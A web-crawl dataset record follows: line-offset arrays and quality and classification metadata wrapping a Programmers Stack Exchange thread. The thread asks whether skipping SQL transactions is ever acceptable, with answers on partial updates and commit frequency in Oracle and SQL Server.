22902,
22903,
22909,
22910,
22933,
22934,
22940,
22941,
22963,
22964,
22970,
22971,
23009,
23010,
23041,
23042,
23048,
23049,
23055,
23056,
23079,
23080,
23086,
23087,
23109,
23110,
23116,
23117,
23149,
23150,
23156,
23157,
23175,
23176,
23193,
23194,
23208,
23209,
23215,
23216,
23232,
23233,
23256,
23257,
23263,
23264,
23285,
23286,
23292,
23293,
23311,
23312,
23318,
23319,
23341,
23342,
23365,
23366,
23390,
23391,
23425,
23426,
23432,
23433,
23479,
23480,
23486,
23487,
23522,
23523,
23529,
23530,
23541,
23542,
23567,
23568,
23574,
23575,
23617,
23618,
23644,
23645,
23651,
23652,
23658,
23659,
23692,
23693,
23699,
23700,
23711,
23712,
23736,
23737,
23743,
23744,
23793,
23794,
23800,
23801,
23820,
23821,
23836,
23837,
23843,
23844,
23878,
23879,
23885,
23886,
23905,
23906,
23921,
23922,
23947,
23948,
23954,
23955,
23981,
23982,
23988,
23989,
24017,
24018,
24024,
24025,
24044,
24045,
24070,
24071,
24090,
24091,
24097,
24098,
24112,
24113,
24119,
24120,
24138,
24139,
24145,
24146,
24152,
24153,
24159,
24160,
24176,
24177,
24183,
24184,
24198,
24199,
24216,
24217,
24234,
24235,
24284,
24285,
24311,
24312,
24319,
24320,
24326,
24327,
24348,
24349,
24388,
24389,
24431,
24432,
24467,
24468,
24503,
24504,
24540,
24541,
24564,
24565,
24583,
24584,
24590,
24591,
24603,
24604,
24633,
24634,
24645,
24646,
24658,
24659,
24690,
24691,
24702,
24703,
24715,
24716,
24745,
24746,
24757,
24758,
24770,
24771,
24801,
24802,
24813,
24814,
24826,
24827,
24846,
24847,
24860,
24861,
24867,
24868,
24890,
24891,
24897,
24898,
24914,
24915,
24939,
24940,
24963,
24964,
24988,
24989,
25010,
25011,
25017,
25018,
25038,
25039,
25056,
25057,
25064,
25065,
25085,
25086,
25092,
25093,
25109,
25110,
25131,
25132,
25147,
25148,
25181,
25182,
25189,
25190,
25241,
25242,
25291,
25292,
25308,
25309,
25315,
25316,
25348,
25349,
25376,
25377,
25384,
25385,
25391,
25392,
25413,
25414,
25496,
25497,
25538,
25539,
25564,
25565,
25584,
25585,
25591,
25592,
25622,
25623,
25629,
25630,
25639,
25640,
25646,
25647,
25675,
25676,
25682,
25683,
25689,
25690,
25714,
25715,
25721,
25722,
25772,
25773,
25779,
25780,
25791,
25792,
25817,
25818,
25824,
25825,
25846,
25847,
25893,
25894,
25940,
25941,
25983,
25984,
26010,
26011,
26017,
26018,
26073,
26074,
26080,
26081,
26090,
26091,
26097,
26098,
26157,
26158,
26164,
26165,
26184,
26185,
26236,
26237,
26252,
26253,
26259,
26260,
26266,
26267,
26315,
26316,
26322,
26323,
26338,
26339,
26360,
26361,
26422,
26423,
26442,
26443,
26466,
26467,
26485,
26486,
26492,
26493,
26507,
26508,
26548,
26549,
26568,
26569,
26599,
26600,
26641,
26642,
26661,
26662,
26699,
26700,
26741,
26742,
26761,
26762,
26811,
26812,
26838,
26839,
26854,
26855,
26866,
26867,
26881,
26882,
26922,
26923,
26942,
26943,
26973,
26974,
27014,
27015,
27034,
27035,
27072,
27073,
27112,
27113,
27132,
27133,
27173,
27174,
27200,
27201,
27216,
27217,
27228,
27229,
27235,
27236,
27242,
27243,
27264,
27265,
27289,
27290,
27313,
27314,
27338,
27339,
27356,
27357,
27363,
27364,
27386,
27387,
27408,
27409,
27428,
27429,
27481,
27482,
27503,
27504,
27548,
27549,
27572,
27573,
27579,
27580,
27612,
27613,
27631,
27632,
27694,
27695,
27725,
27726,
27732,
27733,
27756,
27757,
27788,
27789,
27805,
27806,
27829,
27830,
27836,
27837,
27858,
27859,
27865,
27866,
27884,
27885,
27891,
27892,
27909,
27910,
27933,
27934,
27958,
27959,
27975,
27976,
28001,
28002,
28008,
28009,
28034,
28035,
28052,
28053,
28059,
28060,
28066,
28067,
28084,
28085,
28118,
28119,
28141,
28142,
28159,
28160,
28166,
28167,
28197,
28198,
28204,
28205,
28221,
28222,
28257,
28258,
28264,
28265,
28274,
28275,
28299,
28300,
28323,
28324,
28366,
28367,
28373,
28374,
28393,
28394,
28415,
28416,
28445,
28446,
28452,
28453,
28478,
28479,
28499,
28500,
28506,
28507,
28546,
28547,
28566,
28567,
28582,
28583,
28604,
28605,
28611,
28612,
28656,
28657,
28663,
28664,
28675,
28676,
28693,
28694,
28715,
28716,
28735,
28736,
28742,
28743,
28794,
28795,
28832,
28833,
28852,
28853,
28892,
28893,
28914,
28915,
28921,
28922,
28943,
28944,
28950,
28951,
28995,
28996,
29002,
29003,
29014,
29015,
29038,
29039,
29060,
29061,
29090,
29091,
29097,
29098,
29124,
29125,
29147,
29148,
29154,
29155,
29195,
29196,
29215,
29216,
29231,
29232,
29253,
29254,
29260,
29261,
29307,
29308,
29314,
29315,
29332,
29333,
29354,
29355,
29383,
29384,
29390,
29391,
29422,
29423,
29429,
29430,
29463,
29464,
29470,
29471,
29493,
29494,
29523,
29524,
29544,
29545,
29551,
29552,
29558,
29559,
29565,
29566,
29587,
29588,
29594,
29595,
29643,
29644,
29650,
29651,
29662,
29663,
29684,
29685,
29713,
29714,
29720,
29721,
29774,
29775,
29781,
29782,
29801,
29802,
29817,
29818,
29839,
29840,
29846,
29847,
29892,
29893,
29899,
29900,
29922,
29923,
29929,
29930,
29951,
29952,
29986,
29987,
30024,
30025,
30044,
30045,
30051,
30052,
30061,
30062,
30068,
30069,
30122,
30123,
30129,
30130,
30136,
30137,
30185,
30186,
30192,
30193,
30208,
30209,
30231,
30232,
30238,
30239,
30318,
30319,
30341,
30342,
30377,
30378,
30384,
30385,
30414,
30415,
30421,
30422,
30441,
30442,
30448,
30449,
30458,
30459,
30465,
30466,
30513,
30514,
30520,
30521,
30527,
30528,
30544,
30545,
30551,
30552,
30576,
30577,
30592,
30593,
30614,
30615,
30622,
30623,
30629,
30630,
30684,
30685,
30739,
30740,
30789,
30790,
30839,
30840,
30890,
30891,
30934,
30935,
30980,
30981,
31023,
31024,
31063,
31064,
31087,
31088,
31106,
31107,
31113,
31114,
31128,
31129,
31152,
31153,
31164,
31165,
31179,
31180,
31205,
31206,
31217,
31218,
31232,
31233,
31257,
31258,
31269,
31270,
31284,
31285,
31308,
31309,
31320,
31321,
31335,
31336,
31364,
31365,
31376,
31377,
31391,
31392,
31417,
31418,
31429,
31430,
31444,
31445,
31472,
31473,
31484,
31485,
31499,
31500,
31513,
31514,
31527,
31528,
31542,
31543,
31549,
31550,
31556,
31557,
31586,
31587,
31593,
31594,
31607,
31608,
31632,
31633,
31656,
31657,
31699,
31700,
31706,
31707,
31726,
31727,
31748,
31749,
31778,
31779,
31785,
31786,
31811,
31812,
31832,
31833,
31839,
31840,
31879,
31880,
31899,
31900,
31915,
31916,
31937,
31938,
31944,
31945,
31989,
31990,
31996,
31997,
32008,
32009,
32026,
32027,
32048,
32049,
32068,
32069,
32075,
32076,
32127,
32128,
32165,
32166,
32185,
32186,
32225,
32226,
32247,
32248,
32254,
32255,
32276,
32277,
32283,
32284,
32328,
32329,
32335,
32336,
32347,
32348,
32371,
32372,
32393,
32394,
32423,
32424,
32430,
32431,
32457,
32458,
32480,
32481,
32487,
32488,
32528,
32529,
32548,
32549,
32564,
32565,
32586,
32587,
32593,
32594,
32640,
32641,
32647,
32648,
32665,
32666,
32687,
32688,
32716,
32717,
32723,
32724,
32755,
32756,
32762,
32763,
32796,
32797,
32803,
32804,
32826,
32827,
32856,
32857,
32877,
32878,
32884,
32885,
32891,
32892,
32898,
32899,
32920,
32921,
32927,
32928,
32976,
32977,
32983,
32984,
32995,
32996,
33017,
33018,
33046,
33047,
33053,
33054,
33107,
33108,
33114,
33115,
33134,
33135,
33150,
33151,
33172,
33173,
33179,
33180,
33225,
33226,
33232,
33233,
33255,
33256,
33262,
33263,
33284,
33285,
33319,
33320,
33357,
33358,
33377,
33378,
33384,
33385,
33394,
33395,
33401,
33402,
33455,
33456,
33462,
33463,
33469,
33470,
33518,
33519,
33525,
33526,
33541,
33542,
33564,
33565,
33571,
33572,
33651,
33652,
33674,
33675,
33710,
33711,
33717,
33718,
33747,
33748,
33754,
33755,
33774,
33775,
33781,
33782,
33791,
33792,
33798,
33799,
33846,
33847,
33853,
33854,
33860,
33861,
33877,
33878,
33884,
33885,
33909,
33910,
33925,
33926,
33947,
33948,
33955,
33956,
33962,
33963,
34017,
34018,
34072,
34073,
34122,
34123,
34172,
34173,
34223,
34224,
34267,
34268,
34313,
34314,
34356,
34357,
34396,
34397,
34420,
34421,
34439,
34440,
34446,
34447,
34461,
34462,
34485,
34486,
34497,
34498,
34512,
34513,
34538,
34539,
34550,
34551,
34565,
34566,
34590,
34591,
34602,
34603,
34617,
34618,
34641,
34642,
34653,
34654,
34668,
34669,
34697,
34698,
34709,
34710,
34724,
34725,
34750,
34751,
34762,
34763,
34777,
34778,
34805,
34806,
34817,
34818,
34832,
34833,
34846,
34847,
34860,
34861,
34875,
34876,
34882,
34883,
34889,
34890,
34919,
34920,
34926,
34927,
34951,
34952,
34975,
34976,
34995,
34996,
35010,
35011,
35027,
35028,
35035,
35036,
35053,
35054,
35082,
35083,
35100,
35101,
35132,
35133,
35153,
35154,
35177,
35178,
35217,
35218,
35240,
35241,
35272,
35273,
35310,
35311,
35334,
35335,
35368,
35369,
35375,
35376,
35387,
35388,
35461,
35462,
35478,
35479,
35485,
35486,
35542,
35543,
35552,
35553,
35559,
35560,
35566,
35567
],
"line_end_idx": [
18,
19,
140,
141,
166,
189,
213,
228,
229,
240,
241,
293,
294,
310,
311,
479,
480,
565,
566,
693,
694,
722,
723,
849,
850,
905,
906,
1024,
1025,
1102,
1103,
1196,
1197,
1243,
1244,
1367,
1368,
1404,
1405,
1413,
1414,
1420,
1421,
1426,
1427,
1432,
1433,
1438,
1439,
1444,
1445,
1452,
1453,
1459,
1460,
1487,
1488,
1549,
1550,
1561,
1562,
1574,
1575,
1587,
1588,
1617,
1618,
1637,
1638,
1659,
1660,
1680,
1681,
1704,
1705,
1837,
1838,
1948,
1949,
1968,
1969,
1995,
1996,
2015,
2016,
2027,
2028,
2139,
2140,
2236,
2237,
2262,
2263,
2334,
2335,
2429,
2430,
2521,
2522,
2832,
2833,
2842,
2843,
2895,
2896,
2904,
2905,
2991,
2992,
3019,
3020,
3056,
3057,
3100,
3101,
3146,
3147,
3483,
3484,
3568,
3569,
3785,
3786,
3947,
3948,
4187,
4188,
4241,
4242,
4597,
4598,
4905,
4906,
4943,
4944,
5044,
5045,
5062,
5063,
5098,
5099,
5134,
5135,
5163,
5164,
5177,
5178,
5193,
5194,
5209,
5210,
5225,
5226,
5243,
5244,
5298,
5299,
5474,
5475,
5536,
5537,
5934,
5935,
5952,
5953,
6082,
6083,
6139,
6140,
6453,
6454,
6677,
6678,
6770,
6771,
6813,
6814,
6842,
6843,
6957,
6958,
7069,
7070,
7092,
7093,
7235,
7236,
7646,
7647,
7733,
7734,
7885,
7886,
7961,
7962,
8001,
8002,
8013,
8014,
8020,
8021,
8027,
8028,
8034,
8035,
8057,
8058,
8164,
8165,
8201,
8202,
8350,
8351,
8562,
8563,
8974,
8975,
9292,
9293,
9339,
9340,
9355,
9356,
9684,
9685,
9778,
9779,
9824,
9825,
9909,
9910,
9984,
9985,
10204,
10205,
10410,
10411,
10444,
10445,
10510,
10511,
11387,
11388,
12038,
12039,
12064,
12065,
12314,
12315,
12965,
12966,
13217,
13218,
13403,
13404,
13649,
13650,
13858,
13859,
14552,
14553,
14573,
14574,
14747,
14748,
14763,
14764,
14789,
14790,
14805,
14806,
14821,
14822,
15291,
15292,
15539,
15540,
15592,
15593,
15720,
15721,
15747,
15748,
16446,
16447,
16467,
16468,
16490,
16491,
16518,
16519,
16539,
16540,
16661,
16662,
16813,
16814,
17203,
17204,
17220,
17221,
17235,
17236,
17672,
17673,
17703,
17704,
18107,
18108,
18754,
18755,
18809,
18810,
18954,
18955,
19009,
19010,
19032,
19033,
19341,
19342,
19670,
19671,
19854,
19855,
19868,
19869,
20014,
20015,
20665,
20666,
20688,
20689,
21106,
21107,
21120,
21121,
21414,
21415,
21571,
21572,
21627,
21628,
21650,
21651,
21673,
21674,
21791,
21792,
21990,
21991,
22013,
22014,
22257,
22258,
22280,
22281,
22481,
22482,
22504,
22505,
22516,
22517,
22540,
22541,
22565,
22566,
22583,
22584,
22590,
22591,
22613,
22614,
22632,
22633,
22685,
22686,
22707,
22708,
22761,
22762,
22783,
22784,
22826,
22827,
22850,
22851,
22857,
22858,
22902,
22903,
22909,
22910,
22933,
22934,
22940,
22941,
22963,
22964,
22970,
22971,
23009,
23010,
23041,
23042,
23048,
23049,
23055,
23056,
23079,
23080,
23086,
23087,
23109,
23110,
23116,
23117,
23149,
23150,
23156,
23157,
23175,
23176,
23193,
23194,
23208,
23209,
23215,
23216,
23232,
23233,
23256,
23257,
23263,
23264,
23285,
23286,
23292,
23293,
23311,
23312,
23318,
23319,
23341,
23342,
23365,
23366,
23390,
23391,
23425,
23426,
23432,
23433,
23479,
23480,
23486,
23487,
23522,
23523,
23529,
23530,
23541,
23542,
23567,
23568,
23574,
23575,
23617,
23618,
23644,
23645,
23651,
23652,
23658,
23659,
23692,
23693,
23699,
23700,
23711,
23712,
23736,
23737,
23743,
23744,
23793,
23794,
23800,
23801,
23820,
23821,
23836,
23837,
23843,
23844,
23878,
23879,
23885,
23886,
23905,
23906,
23921,
23922,
23947,
23948,
23954,
23955,
23981,
23982,
23988,
23989,
24017,
24018,
24024,
24025,
24044,
24045,
24070,
24071,
24090,
24091,
24097,
24098,
24112,
24113,
24119,
24120,
24138,
24139,
24145,
24146,
24152,
24153,
24159,
24160,
24176,
24177,
24183,
24184,
24198,
24199,
24216,
24217,
24234,
24235,
24284,
24285,
24311,
24312,
24319,
24320,
24326,
24327,
24348,
24349,
24388,
24389,
24431,
24432,
24467,
24468,
24503,
24504,
24540,
24541,
24564,
24565,
24583,
24584,
24590,
24591,
24603,
24604,
24633,
24634,
24645,
24646,
24658,
24659,
24690,
24691,
24702,
24703,
24715,
24716,
24745,
24746,
24757,
24758,
24770,
24771,
24801,
24802,
24813,
24814,
24826,
24827,
24846,
24847,
24860,
24861,
24867,
24868,
24890,
24891,
24897,
24898,
24914,
24915,
24939,
24940,
24963,
24964,
24988,
24989,
25010,
25011,
25017,
25018,
25038,
25039,
25056,
25057,
25064,
25065,
25085,
25086,
25092,
25093,
25109,
25110,
25131,
25132,
25147,
25148,
25181,
25182,
25189,
25190,
25241,
25242,
25291,
25292,
25308,
25309,
25315,
25316,
25348,
25349,
25376,
25377,
25384,
25385,
25391,
25392,
25413,
25414,
25496,
25497,
25538,
25539,
25564,
25565,
25584,
25585,
25591,
25592,
25622,
25623,
25629,
25630,
25639,
25640,
25646,
25647,
25675,
25676,
25682,
25683,
25689,
25690,
25714,
25715,
25721,
25722,
25772,
25773,
25779,
25780,
25791,
25792,
25817,
25818,
25824,
25825,
25846,
25847,
25893,
25894,
25940,
25941,
25983,
25984,
26010,
26011,
26017,
26018,
26073,
26074,
26080,
26081,
26090,
26091,
26097,
26098,
26157,
26158,
26164,
26165,
26184,
26185,
26236,
26237,
26252,
26253,
26259,
26260,
26266,
26267,
26315,
26316,
26322,
26323,
26338,
26339,
26360,
26361,
26422,
26423,
26442,
26443,
26466,
26467,
26485,
26486,
26492,
26493,
26507,
26508,
26548,
26549,
26568,
26569,
26599,
26600,
26641,
26642,
26661,
26662,
26699,
26700,
26741,
26742,
26761,
26762,
26811,
26812,
26838,
26839,
26854,
26855,
26866,
26867,
26881,
26882,
26922,
26923,
26942,
26943,
26973,
26974,
27014,
27015,
27034,
27035,
27072,
27073,
27112,
27113,
27132,
27133,
27173,
27174,
27200,
27201,
27216,
27217,
27228,
27229,
27235,
27236,
27242,
27243,
27264,
27265,
27289,
27290,
27313,
27314,
27338,
27339,
27356,
27357,
27363,
27364,
27386,
27387,
27408,
27409,
27428,
27429,
27481,
27482,
27503,
27504,
27548,
27549,
27572,
27573,
27579,
27580,
27612,
27613,
27631,
27632,
27694,
27695,
27725,
27726,
27732,
27733,
27756,
27757,
27788,
27789,
27805,
27806,
27829,
27830,
27836,
27837,
27858,
27859,
27865,
27866,
27884,
27885,
27891,
27892,
27909,
27910,
27933,
27934,
27958,
27959,
27975,
27976,
28001,
28002,
28008,
28009,
28034,
28035,
28052,
28053,
28059,
28060,
28066,
28067,
28084,
28085,
28118,
28119,
28141,
28142,
28159,
28160,
28166,
28167,
28197,
28198,
28204,
28205,
28221,
28222,
28257,
28258,
28264,
28265,
28274,
28275,
28299,
28300,
28323,
28324,
28366,
28367,
28373,
28374,
28393,
28394,
28415,
28416,
28445,
28446,
28452,
28453,
28478,
28479,
28499,
28500,
28506,
28507,
28546,
28547,
28566,
28567,
28582,
28583,
28604,
28605,
28611,
28612,
28656,
28657,
28663,
28664,
28675,
28676,
28693,
28694,
28715,
28716,
28735,
28736,
28742,
28743,
28794,
28795,
28832,
28833,
28852,
28853,
28892,
28893,
28914,
28915,
28921,
28922,
28943,
28944,
28950,
28951,
28995,
28996,
29002,
29003,
29014,
29015,
29038,
29039,
29060,
29061,
29090,
29091,
29097,
29098,
29124,
29125,
29147,
29148,
29154,
29155,
29195,
29196,
29215,
29216,
29231,
29232,
29253,
29254,
29260,
29261,
29307,
29308,
29314,
29315,
29332,
29333,
29354,
29355,
29383,
29384,
29390,
29391,
29422,
29423,
29429,
29430,
29463,
29464,
29470,
29471,
29493,
29494,
29523,
29524,
29544,
29545,
29551,
29552,
29558,
29559,
29565,
29566,
29587,
29588,
29594,
29595,
29643,
29644,
29650,
29651,
29662,
29663,
29684,
29685,
29713,
29714,
29720,
29721,
29774,
29775,
29781,
29782,
29801,
29802,
29817,
29818,
29839,
29840,
29846,
29847,
29892,
29893,
29899,
29900,
29922,
29923,
29929,
29930,
29951,
29952,
29986,
29987,
30024,
30025,
30044,
30045,
30051,
30052,
30061,
30062,
30068,
30069,
30122,
30123,
30129,
30130,
30136,
30137,
30185,
30186,
30192,
30193,
30208,
30209,
30231,
30232,
30238,
30239,
30318,
30319,
30341,
30342,
30377,
30378,
30384,
30385,
30414,
30415,
30421,
30422,
30441,
30442,
30448,
30449,
30458,
30459,
30465,
30466,
30513,
30514,
30520,
30521,
30527,
30528,
30544,
30545,
30551,
30552,
30576,
30577,
30592,
30593,
30614,
30615,
30622,
30623,
30629,
30630,
30684,
30685,
30739,
30740,
30789,
30790,
30839,
30840,
30890,
30891,
30934,
30935,
30980,
30981,
31023,
31024,
31063,
31064,
31087,
31088,
31106,
31107,
31113,
31114,
31128,
31129,
31152,
31153,
31164,
31165,
31179,
31180,
31205,
31206,
31217,
31218,
31232,
31233,
31257,
31258,
31269,
31270,
31284,
31285,
31308,
31309,
31320,
31321,
31335,
31336,
31364,
31365,
31376,
31377,
31391,
31392,
31417,
31418,
31429,
31430,
31444,
31445,
31472,
31473,
31484,
31485,
31499,
31500,
31513,
31514,
31527,
31528,
31542,
31543,
31549,
31550,
31556,
31557,
31586,
31587,
31593,
31594,
31607,
31608,
31632,
31633,
31656,
31657,
31699,
31700,
31706,
31707,
31726,
31727,
31748,
31749,
31778,
31779,
31785,
31786,
31811,
31812,
31832,
31833,
31839,
31840,
31879,
31880,
31899,
31900,
31915,
31916,
31937,
31938,
31944,
31945,
31989,
31990,
31996,
31997,
32008,
32009,
32026,
32027,
32048,
32049,
32068,
32069,
32075,
32076,
32127,
32128,
32165,
32166,
32185,
32186,
32225,
32226,
32247,
32248,
32254,
32255,
32276,
32277,
32283,
32284,
32328,
32329,
32335,
32336,
32347,
32348,
32371,
32372,
32393,
32394,
32423,
32424,
32430,
32431,
32457,
32458,
32480,
32481,
32487,
32488,
32528,
32529,
32548,
32549,
32564,
32565,
32586,
32587,
32593,
32594,
32640,
32641,
32647,
32648,
32665,
32666,
32687,
32688,
32716,
32717,
32723,
32724,
32755,
32756,
32762,
32763,
32796,
32797,
32803,
32804,
32826,
32827,
32856,
32857,
32877,
32878,
32884,
32885,
32891,
32892,
32898,
32899,
32920,
32921,
32927,
32928,
32976,
32977,
32983,
32984,
32995,
32996,
33017,
33018,
33046,
33047,
33053,
33054,
33107,
33108,
33114,
33115,
33134,
33135,
33150,
33151,
33172,
33173,
33179,
33180,
33225,
33226,
33232,
33233,
33255,
33256,
33262,
33263,
33284,
33285,
33319,
33320,
33357,
33358,
33377,
33378,
33384,
33385,
33394,
33395,
33401,
33402,
33455,
33456,
33462,
33463,
33469,
33470,
33518,
33519,
33525,
33526,
33541,
33542,
33564,
33565,
33571,
33572,
33651,
33652,
33674,
33675,
33710,
33711,
33717,
33718,
33747,
33748,
33754,
33755,
33774,
33775,
33781,
33782,
33791,
33792,
33798,
33799,
33846,
33847,
33853,
33854,
33860,
33861,
33877,
33878,
33884,
33885,
33909,
33910,
33925,
33926,
33947,
33948,
33955,
33956,
33962,
33963,
34017,
34018,
34072,
34073,
34122,
34123,
34172,
34173,
34223,
34224,
34267,
34268,
34313,
34314,
34356,
34357,
34396,
34397,
34420,
34421,
34439,
34440,
34446,
34447,
34461,
34462,
34485,
34486,
34497,
34498,
34512,
34513,
34538,
34539,
34550,
34551,
34565,
34566,
34590,
34591,
34602,
34603,
34617,
34618,
34641,
34642,
34653,
34654,
34668,
34669,
34697,
34698,
34709,
34710,
34724,
34725,
34750,
34751,
34762,
34763,
34777,
34778,
34805,
34806,
34817,
34818,
34832,
34833,
34846,
34847,
34860,
34861,
34875,
34876,
34882,
34883,
34889,
34890,
34919,
34920,
34926,
34927,
34951,
34952,
34975,
34976,
34995,
34996,
35010,
35011,
35027,
35028,
35035,
35036,
35053,
35054,
35082,
35083,
35100,
35101,
35132,
35133,
35153,
35154,
35177,
35178,
35217,
35218,
35240,
35241,
35272,
35273,
35310,
35311,
35334,
35335,
35368,
35369,
35375,
35376,
35387,
35388,
35461,
35462,
35478,
35479,
35485,
35486,
35542,
35543,
35552,
35553,
35559,
35560,
35566,
35567,
35573
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 35573,
"ccnet_original_nlines": 1581,
"rps_doc_curly_bracket": 0.0047789099626243114,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.11696231365203857,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.017738360911607742,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.31305432319641113,
"rps_doc_frac_unique_words": 0.22708985209465027,
"rps_doc_mean_word_length": 5.456414699554443,
"rps_doc_num_sentences": 245,
"rps_doc_symbol_to_word_ratio": 0.004988910164684057,
"rps_doc_unigram_entropy": 5.812796115875244,
"rps_doc_word_count": 4474,
"rps_doc_frac_chars_dupe_10grams": 0.14312632381916046,
"rps_doc_frac_chars_dupe_5grams": 0.2019498646259308,
"rps_doc_frac_chars_dupe_6grams": 0.1690971702337265,
"rps_doc_frac_chars_dupe_7grams": 0.1589382290840149,
"rps_doc_frac_chars_dupe_8grams": 0.15385876595973969,
"rps_doc_frac_chars_dupe_9grams": 0.14697690308094025,
"rps_doc_frac_chars_top_2gram": 0.004260200075805187,
"rps_doc_frac_chars_top_3gram": 0.008028839714825153,
"rps_doc_frac_chars_top_4gram": 0.006881860084831715,
"rps_doc_books_importance": -3924.049560546875,
"rps_doc_books_importance_length_correction": -3924.049560546875,
"rps_doc_openwebtext_importance": -1798.876708984375,
"rps_doc_openwebtext_importance_length_correction": -1798.876708984375,
"rps_doc_wikipedia_importance": -1187.6097412109375,
"rps_doc_wikipedia_importance_length_correction": -1187.6097412109375
},
"fasttext": {
"dclm": 0.9620229005813599,
"english": 0.0016940899658948183,
"fineweb_edu_approx": 1.293265461921692,
"eai_general_math": 0.0010924299713224173,
"eai_open_web_math": 0.6673067212104797,
"eai_web_code": 0.9284968376159668
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.133",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "23",
"label": "Tutorial"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-8,809,919,118,312,764,000
|
Sign up ×
Programmers Stack Exchange is a question and answer site for professional programmers interested in conceptual questions about software development. It's 100% free.
I am looking at a codebase where a developer never uses SQL transactions i.e. each update/insert into the SQL database is an atomic operation.
I believe the codebase would benefit from transactions. I was looking online today and in one Stackoverflow question an answerer says: "In some situations it is better to have a partial update rather than none at all". Is there any truth in this? I suppose it depends on the problem domain to some extent.
share|improve this question
2
What is it doing? A partial update in finance is likely much worse than none. A partial update to a log file is likely 'ho hum'. – MichaelT Apr 25 '13 at 19:04
There are no Transactions. I was taught that if an operation inserts/updates two or more tables then it should be part of a Transaction. I am wandering if there are scenarios when this statement is false. – w0051977 Apr 25 '13 at 19:06
@MichaelT,it is a high volume website. This article seems to hold true: martinfowler.com/bliki/Transactionless.html – w0051977 Apr 25 '13 at 19:16
1
I have worked on high volume finance web sites, and high volume bug tracking web sites. On the bug tracking, I had auto commit turned on - this was for ease of use more than performance. In finance, it was all transactions that reflected one consistent set of state changes. – MichaelT Apr 25 '13 at 19:20
@MichaelT, thanks +1. Can you post an answer so that I can give credit? – w0051977 Apr 25 '13 at 19:24
2 Answers 2
It depends not just on the problem domain, but also on technical considerations. Basically, it comes down to the simple question: "Will there be unacceptable problems when a partial update happens?" Some examples:
• Transfering money from one account to another. A partial update is completely unacceptable for domain reasons.
• Adding a vote to an online poll and incrementing a result count (which is only for display, with the final result being recalculated from the vote table). A partial update is probably acceptable.
• Adding something to an n:m relationship. A partial update would result in an inconsistent state where you have either an entry that is not connected, or a connection without a matching entry. This is unacceptable for technical reasons - you'd get an error whenever that entry is encountered and it would likely be impossible to fix this error within the system.
• A hardware unit that sends batches of sensor data to be stored. Adding only some of the entries of a batch is probably better than losing all of it.
Honestly, it's really rare for partial updates to be tolerable.
share|improve this answer
Thanks +1. What are your thoughts on this article? martinfowler.com/bliki/Transactionless.html – w0051977 Apr 25 '13 at 19:46
1
@w0051977: The key statement is "You have to pay attention to the order of your commits, getting the more important ones in first. At each commit you have to check that it succeeded and decide what to do if it fails." - that's quite a lot of additional work compared to using transactions, and very error-prone. You're manually doing something very similar to what a DB does when you use transactions. But it's hand-tailored for every single operation, which allows you to do only the minimal work necessary to maintain exactly as much integrity as you need. – Michael Borgwardt Apr 25 '13 at 20:51
From the database perspective, frequent commits are often used to prevent records being unreadable by other sessions as they are locked by the updating session.
However this varies by RDBMS. Oracle has always had an MVCC system that prevented readers from blocking writers and writers from blocking readers, so it is not a problem there for instance.
Over-frequent committing on Oracle is strongly discouraged not only because it can leave partial transactions in the system but also because a COMMIT requires a synchronous redo log buffer flush which stalls the session (a high level of log_file_sync wait events is symptomatic of over-committing). Redo log buffers are asynchronously flushed every few seconds or when they are X% full anyway, so a longer running transaction may have less work to do during an explicit commit if it is deferred until the end of the business transaction anyway.
share|improve this answer
Thanks. I am not sure how this answers my question. Are you saying it is acceptable not to use transactions in high volume websites? What is a high volume website? I understand it to mean a website that is a front end to a database containing lots of records but I am unsure. – w0051977 Apr 26 '13 at 8:56
What I'm saying is that one consideration in deciding whether to commit frequently is the database technology. On some, for example Oracle, frequent commits will be slower. On others frequent commits are required to avoid locking problems. what database is used for the system you are using? – David Aldridge Apr 26 '13 at 9:03
Thanks. The system in question queries multiple systems (using SELECT), but only updates/deletes/inserts from/into one SQL Server database. – w0051977 Apr 26 '13 at 9:14
The use of SQL Server may explain why frequent commits are issued. – David Aldridge Apr 26 '13 at 9:17
Thanks. Could you clarify why it may explain why frequent commits are issued? +1. – w0051977 Apr 26 '13 at 9:47
Your Answer
discard
By posting your answer, you agree to the privacy policy and terms of service.
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
{
"url": "http://programmers.stackexchange.com/questions/196141/not-using-sql-transactions",
"source_domain": "programmers.stackexchange.com",
"snapshot_id": "crawl=CC-MAIN-2015-48",
"warc_metadata": {
"Content-Length": "85654",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:MVWRF7AFTHUSAOV556QKDLQKKNWE4ZYD",
"WARC-Concurrent-To": "<urn:uuid:86ba55b3-0800-4816-a8cb-d8b4a4afc97e>",
"WARC-Date": "2015-11-30T22:41:40Z",
"WARC-IP-Address": "104.16.119.182",
"WARC-Identified-Payload-Type": null,
